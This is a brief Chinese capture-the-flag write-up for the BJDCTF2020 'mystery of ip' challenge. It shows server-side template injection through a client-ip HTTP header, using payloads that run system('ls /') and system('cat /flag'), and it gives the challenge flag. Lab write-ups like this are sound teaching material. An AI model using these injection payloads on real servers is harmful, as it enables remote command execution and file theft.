[BJDCTF2020]The mystery of ip

启动靶机,点击flag,出现我的IP地址

在 http头添加 client-ip: 1.1.1.1 发现可以更改返回的ip

尝试 client-ip: 1.1.1.1;{7*7} 返回49,说明存在服务器端模板注入SSTI

(其实还尝试一下xss,发现也存在。但不知道怎么利用)

client-ip: 1.1.1.1;{system("ls /")} 在根目录发现了 flag

client-ip: 1.1.1.1;{system("cat /flag")}

找到了flag{1846df37-567f-4f01-8b77-a091ce7a3356}